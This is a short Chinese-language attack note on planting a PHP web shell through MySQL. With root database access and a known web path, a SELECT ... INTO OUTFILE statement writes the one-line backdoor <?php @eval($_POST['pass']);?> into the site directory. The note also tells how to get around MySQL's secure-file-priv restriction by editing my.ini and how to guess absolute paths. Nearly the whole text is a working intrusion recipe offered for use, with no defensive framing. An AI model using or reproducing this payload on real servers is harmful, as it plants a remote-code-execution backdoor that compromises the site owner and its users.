利用mysql寫入一句話木馬
前提:
root權限,知道了服務器的web的絕對路徑
select "<?php @eval($_POST['pass']);?>" INTO OUTFILE "D:\\WWW\\22.php"
如果執行成功,生成D:\WWW\22.php,並寫入
<?php @eval($_POST['pass']);?>
如果出現:
提示錯誤[Error Code] 1290 - The MySQL server is running with the --secure-file-priv option解決辦法
是mysql設置的權限的問題
mysql對通過文件導入導出作了限制,默認不允許
show variables like '%secure%';
修改my.ini
secure_auth = ON
secure_file_priv = ""
注意:
1、絕對路徑的猜解
2、INTO OUTFILE 后面的"D:\\WWW\\22.php"(對反斜杠做了一次轉義)